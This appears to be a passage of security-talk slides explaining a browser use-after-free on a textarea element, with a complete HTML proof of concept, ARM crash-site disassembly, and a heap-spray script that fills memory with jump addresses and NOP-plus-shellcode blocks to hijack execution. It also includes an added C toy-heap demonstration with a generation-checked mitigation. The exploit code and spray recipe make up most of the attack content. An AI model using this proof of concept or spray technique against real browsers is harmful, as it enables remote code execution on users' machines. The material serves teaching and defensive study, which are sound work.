49. [Diagram: heap at 0x0000a000 / 0x00650000, with the textarea object at 0x00385100]

    var elem1 = doc.getElementsByTagName("textarea")
    var elem2 = doc.getElementById("target")

    <body>
      <textarea id="target" rows=20>blah</textarea>
    </body>

We make references to the element in two different ways.

50. [Diagram: heap at 0x0000a000 / 0x00650000, textarea object at 0x00385100]

    var elem1 = doc.getElementsByTagName("textarea")
    var elem2 = doc.getElementById("target")
    elem2.parentNode.removeChild(target);

    <body>
      <textarea id="target" rows=20>blah</textarea>
    </body>

We remove the element using our second reference. This frees the memory that both variables are referencing, but the elem1 variable retains its pointer to the deallocated spot in memory.

51. [Diagram: heap at 0x0000a000 / 0x00650000, the slot at 0x00385100 now free]

    var elem1 = doc.getElementsByTagName("textarea")
    elem2.parentNode.removeChild(target);

    <body>
    </body>

We are left with a pointer to memory that is deallocated. That memory can now be reallocated.

52. [Diagram: heap at 0x0000a000 / 0x00650000, the freed slot being refilled]

    var elem1 = doc.getElementsByTagName("textarea")
    elem2.parentNode.removeChild(target);
    for (var i = 0; i < 10000; i++) { var s = new String("LALA"); }

    <body>
    </body>

Using a for loop we create the same small string over and over until garbage collection runs and the freed memory is refilled with our new data.

53. [Diagram: heap at 0x0000a000 / 0x00650000, the old textarea slot now holding "LALA"]

    var elem1 = doc.getElementsByTagName("textarea")
    elem2.parentNode.removeChild(target);
    for (var i = 0; i < 10000; i++) { var s = new String("LALA"); }
    elem1.innerHTML

    <body>
    </body>

We can now request data through our original variable, and get back the sprayed contents: LALA LALA LALA LALA LALA LALA ...
54. Proof of concept

    <html>
    <head>
    <script>
    function test() {
        var elem = document.getElementById("t");   // reference to the textarea tag
        // reference to the child nodes of the rows attribute under the textarea tag
        var nodes = document.getElementById("t").getAttributeNode('rows').childNodes;
        document.body.removeChild(elem);            // remove the element
        elem.getAttributeNode('rows').removeChild(nodes[0]);   // remove the child nodes
        setTimeout(function() {
            for (var i = 0; i < 10000; i++) { var s = new String("abc"); };   // trigger heap garbage collection
            nodes[0].textContent;                   // ask for text contained in an object that no longer exists
        }, 0);
    }
    </script>
    </head>
    <body onload=test()>
    <textarea id=t rows=20>textarea</textarea>   <!-- element we are targeting -->
    </body>
    </html>
61. What does that mean?

    4a57a: 6d42    ldr  r2, [r0, #84]   ; load the word stored at (r0 + 84) into r2
    4a57c: 1c20    adds r0, r4, #0      ; r0 = r4
    4a57e: 4790    blx  r2              ; branch to the address in r2 and start executing there

The crash site loads a pointer from the freed object (r0 + 84) and then jumps through it, so whatever now occupies that memory decides where execution goes.
64. Controlling the Heap

[Diagram: heap at 0x0000a000 / 0x00640000]

The heap will place data in the next available spot that is big enough. We can use this to control the end of the heap.
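The reuse behaviour the slides rely on, shown as an added example that is not part of the presentation: a constructed first-fit toy heap (not any browser's allocator) hands a freed slot to the next same-size allocation, so a raw pointer kept across the free reads the new contents, exactly the elem1/elem2 situation. The hardened half shows the mitigation a defender would want: a generation-checked handle that refuses to dereference an object freed since the handle was taken. All names and the arena layout are assumptions made for this example.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy heap (constructed for illustration): fixed-size slots handed out first-fit,
 * so a freed slot is "the next available spot" for the next allocation of that size. */
#define SLOT_SIZE 16
#define NSLOTS 8

typedef struct {
    char data[SLOT_SIZE];
    bool in_use;
    uint32_t generation;   /* bumped on every free; consulted by the checked handle below */
} slot_t;

static slot_t arena[NSLOTS];

static void arena_reset(void) { memset(arena, 0, sizeof arena); }

/* First-fit allocation: returns the index of the first free slot, or -1 when full. */
static int arena_alloc(const char *contents) {
    for (int i = 0; i < NSLOTS; i++) {
        if (!arena[i].in_use) {
            arena[i].in_use = true;
            memset(arena[i].data, 0, SLOT_SIZE);
            strncpy(arena[i].data, contents, SLOT_SIZE - 1);
            return i;
        }
    }
    return -1;
}

/* Freeing marks the slot reusable and invalidates every handle taken before. */
static void arena_free(int idx) {
    arena[idx].in_use = false;
    arena[idx].generation++;
    memset(arena[idx].data, 0, SLOT_SIZE);
}

/* Vulnerable pattern (the elem1/elem2 slides): a raw pointer outlives the object. */
const char *uaf_raw(void) {
    arena_reset();
    int idx = arena_alloc("blah");          /* the textarea's backing object */
    const char *stale = arena[idx].data;    /* first reference, like elem1 */
    arena_free(idx);                        /* removed through the second reference, like elem2 */
    for (int i = 0; i < NSLOTS; i++)        /* allocation loop: same-size strings refill the slot */
        arena_alloc("LALA");
    return stale;                           /* reads whatever now occupies the freed slot */
}

/* Hardened pattern: a generation-checked handle instead of a raw pointer. */
typedef struct { int idx; uint32_t generation; } handle_t;

static handle_t handle_take(int idx) {
    handle_t h = { idx, arena[idx].generation };
    return h;
}

/* NULL when the object was freed (and possibly reallocated) after the handle was taken. */
static const char *handle_deref(handle_t h) {
    if (h.idx < 0 || h.idx >= NSLOTS) return NULL;
    if (!arena[h.idx].in_use) return NULL;
    if (arena[h.idx].generation != h.generation) return NULL;
    return arena[h.idx].data;
}

const char *uaf_checked(void) {
    arena_reset();
    int idx = arena_alloc("blah");
    handle_t stale = handle_take(idx);
    arena_free(idx);
    for (int i = 0; i < NSLOTS; i++)
        arena_alloc("LALA");
    return handle_deref(stale);             /* NULL: the slot's generation moved on */
}

int main(void) {
    printf("raw pointer after free and reuse reads: \"%s\"\n", uaf_raw());
    const char *p = uaf_checked();
    printf("checked handle after free and reuse: %s\n", p ? p : "(invalid, access refused)");
    return 0;
}
```

The raw variant returns "LALA" because the first-fit allocator placed the sprayed string in the slot the stale pointer still names; the checked variant returns NULL because the free bumped the slot's generation, which is the property a detector or a hardened allocator can key on.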
65./66. The Goal

[Diagram: heap at 0x0000a000 / 0x00640000, the freed slot now holding 0x00580058]

We use the loop below to populate our "use after free":

    for (var i = 0; i < 70000; i++) { var s = new String(unescape("00580058")); };

The freed object's memory now reads as 0x00580058.
67. The Goal

[Diagram: heap at 0x0000a000 / 0x00640000, freed slot = 0x00580058]

    var scode = unescape("00600060");
    var scode2 = unescape("5005e1a0");
    do {
        scode += scode;
        scode2 += scode2;
    } while (scode.length <= 0x1000);
    scode2 += shell
    target = new Array();
    for (i = 0; i < 300; i++) {
        if (i < 130) { target[i] = scode; }
        if (i > 130) { target[i] = scode2; }
        document.write(target[i]);
        document.write("<br />");
        if (i > 250) {
68. The Goal

scode = 0x00600060, len = 0x1000. We write this value to the page 130 times.

[Diagram: freed slot = 0x00580058; the memory at 0x00580058 is filled with 0x00600060 repeated: 00600060 00600060 00600060 00600060 ...]

69. The Goal

scode2 = 0xe1a05005 (a NOP), len = 0x1000, followed by the shellcode. We write this value to the page 120 times.

[Diagram: freed slot = 0x00580058; 0x00580058 holds 0x00600060 repeated; 0x00600060 holds the NOP + shell blocks: Nop + shell, Nop + shell, Nop + shell, Nop + shell ...]
70. The Goal

1. We access our "use after free" address (nodes[0].textContent).
2. That address sends us to 0x00580058. The value at 0x00580058 is 0x00600060, which is loaded into r2.
3. pc goes to the address in r2 (0x00600060, the NOP + shellcode region) and starts execution.

[Diagram: freed slot = 0x00580058 -> 0x00600060 -> 0xe1a05005 + shellcode; 0x00580058 holds 00600060 00600060 00600060 00600060 ...; 0x00600060 holds Nop + shell, Nop + shell, Nop + shell, Nop + shell ...]